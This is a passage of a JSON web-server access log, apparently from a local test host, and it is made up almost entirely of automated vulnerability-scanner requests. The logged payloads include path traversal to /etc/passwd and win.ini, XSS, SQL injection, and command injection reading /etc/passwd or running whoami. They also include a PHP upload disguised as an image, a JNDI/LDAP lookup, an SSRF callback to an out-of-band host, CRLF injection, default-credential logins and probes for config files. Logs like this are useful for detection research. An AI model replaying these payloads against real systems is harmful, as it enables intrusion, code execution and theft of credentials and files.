filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.466","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.466","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.380","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.419","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /footer.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /data/pbootcms.db HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.439","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc\x0D\x0A CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\x0D\x0AuserDetails","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.349","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.294","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.461","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:08 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.469","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"28fHqXoZm7BFqt1AogpKX5CEZac.tld","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.417","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.509","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.460","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.341","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.454","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /main/calendar/agenda_list.php?type=xss\x22+onmouseover=alert(document.domain)+\x22 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c9oms3gsmpve1ijt0mc0951i43cwuy9x8.oast.live%23.salesforce.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.006","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.502","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.119","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.inc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.890","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.335","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /(download)/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.335","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.481","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.458","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.428","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test\x22) and extractvalue(1,concat(0x7e,md5(1234567890))) -- a HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:09 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jasperserver/login.html?error=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.484","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /db.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.445","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/56 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.482","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.157","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?redirect=..%2f..%2f..%2f..%2fwindows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.288","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.417","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:10 